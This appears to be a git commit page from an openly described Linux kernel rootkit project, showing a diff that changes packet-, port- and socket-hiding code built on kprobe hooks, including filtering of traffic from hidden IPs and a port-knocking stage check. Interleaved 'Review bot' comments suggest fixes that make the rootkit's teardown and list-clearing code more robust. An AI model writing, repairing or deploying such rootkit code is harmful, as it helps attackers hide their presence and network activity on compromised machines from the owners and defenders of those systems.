linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 7c3544db291432da0cca94991b9b3b073b936d39
parent 0adb3766ae1da910e6ff82bca526255e216b7ab8
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 10 Jan 2021 20:45:25 +0100

removes redundant code

Diffstat:
Msrc/hook.c | 1-
Msrc/hook.h | 1-
Msrc/packhide.c | 12++----------
Msrc/porthide.c | 2--
Msrc/sockhide.c | 8++++++++
5 files changed, 10 insertions(+), 14 deletions(-)

diff --git a/src/hook.c b/src/hook.c
@@ -38,7 +38,6 @@ atomic_t read_count;
 atomic_t getdents_count;
 atomic_t getdents64_count;
 atomic_t tty_read_count;
-atomic_t packet_rcv_count;
 asmlinkage ssize_t (*sys_read)(const struct pt_regs *);
 asmlinkage long (*sys_getdents)(const struct pt_regs *);
diff --git a/src/hook.h b/src/hook.h
@@ -21,7 +21,6 @@ extern atomic_t read_count;
 extern atomic_t tty_read_count;
 extern atomic_t getdents_count;
 extern atomic_t getdents64_count;
-extern atomic_t packet_rcv_count;
 extern asmlinkage ssize_t (*sys_read)(const struct pt_regs *);
 extern asmlinkage long (*sys_getdents)(const struct pt_regs *);
diff --git a/src/packhide.c b/src/packhide.c
@@ -77,7 +77,6 @@ unhide_packets(void)
 unregister_kprobe(&p_rcv);
 unregister_kprobe(&tp_rcv);
 unregister_kprobe(&p_rcv_spkt);
- while (atomic_read(&packet_rcv_count) > 0);
 }
 }
@@ -130,8 +129,6 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
 struct sk_buff *clone = skb_clone(skb, GFP_KERNEL);
 pt_regs->di = (long unsigned int)clone;
- atomic_inc(&packet_rcv_count);
-
 if (ver == 0x60) {
 struct ipv6hdr *iphdr;
@@ -158,10 +155,8 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
 || list_contains_ip(&hidden_ips, (u8 *)&iphdr->daddr, v4))
 clone->pkt_type = PACKET_LOOPBACK;
 }
- } else {
- atomic_dec(&packet_rcv_count);
+ } else
 return 0;
- }
 if (rootkit.hiding_sockets) {
 // We need to intercept (RST) the TCP handshake
@@ -171,10 +166,8 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
 tcphdr = (struct tcphdr *)skb_transport_header(skb);
 unsigned src_port = (unsigned)ntohs(tcphdr->source);
- if (list_contains_knock(&ips_stage3, ip, version)) {
- atomic_dec(&packet_rcv_count);
+ if (list_contains_knock(&ips_stage3, ip, version))
 return 0;
- }
 if (tcphdr->syn || !tcphdr->ack) goto check_port;
@@ -215,7 +208,6 @@ check_port:
 }
 }
- atomic_dec(&packet_rcv_count);
 return 0;
 }
diff --git a/src/porthide.c b/src/porthide.c
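Review bot: With packet_rcv_count removed, unhide_packets() in the first packhide.c hunk relies on unregister_kprobe() alone to wait for g7_packet_rcv() handlers that are still running before the probes are torn down; unregister_kprobe() does synchronize against in-flight handlers, so the busy-wait was indeed redundant, but nothing in the file records that this is what the teardown depends on. A one-line comment after the last unregister_kprobe() call, `/* unregister_kprobe() waits for running handlers; no extra sync needed */`, would stop a later maintainer from reintroducing a hand-rolled spin-wait. Both unhide_packets() and g7_packet_rcv() start outside the hunks shown.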
@@ -117,8 +117,6 @@ find_lport_in_list(lport_list_t_ptr head, lport_t lport)
 if (i->lport == lport) {
 DEBUG_INFO("found port %d\n", lport);
 return i;
- } else {
- DEBUG_INFO("%d is not port %d\n", i->lport, lport);
 }
 return NULL;
diff --git a/src/sockhide.c b/src/sockhide.c
@@ -96,6 +96,7 @@ unhide_sockets(void)
 sys_recvmsg = NULL;
 unhide_packets();
+ clear_hidden_ports();
 clear_hidden_lports();
 }
 }
@@ -118,6 +119,13 @@ unhide_port(port_t port, proto_t proto)
 unhide_lport(port);
 }
+void
+clear_hidden_ports(void)
+{
+ i = hidden_ports_tail;
+ while ((i = remove_port_from_list(i, i->port, i->proto)));
+}
+
 bool
 list_contains_port(port_list_t_ptr list, port_t port, proto_t proto)
 {
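Review bot: The new clear_hidden_ports() call in unhide_sockets() (first sockhide.c hunk) sits above the function's definition in the same file, and the diffstat touches no header, so unless sockhide.h already declares it this call is an implicit function declaration, which GCC warns about and newer toolchains reject outright. Either add `void clear_hidden_ports(void);` to the header next to the other sockhide prototypes, or move the definition above unhide_sockets(). unhide_sockets() itself starts outside the hunk.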
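Review bot: clear_hidden_ports() in the second sockhide.c hunk reads i->port and i->proto before testing i, so when hidden_ports_tail is NULL (nothing hidden, or a second unhide) the first loop iteration is a NULL pointer dereference in kernel context. The loop also assigns to an `i` the function never declares, so it is presumably a file-scope variable shared with the other list walkers; a local removes that coupling. Both are fixed by `port_list_t_ptr i = hidden_ports_tail;` / `while (i)` / `i = remove_port_from_list(i, i->port, i->proto);` — assuming hidden_ports_tail has the node type list_contains_port() takes and that remove_port_from_list() returns the next node, which the original loop already relies on.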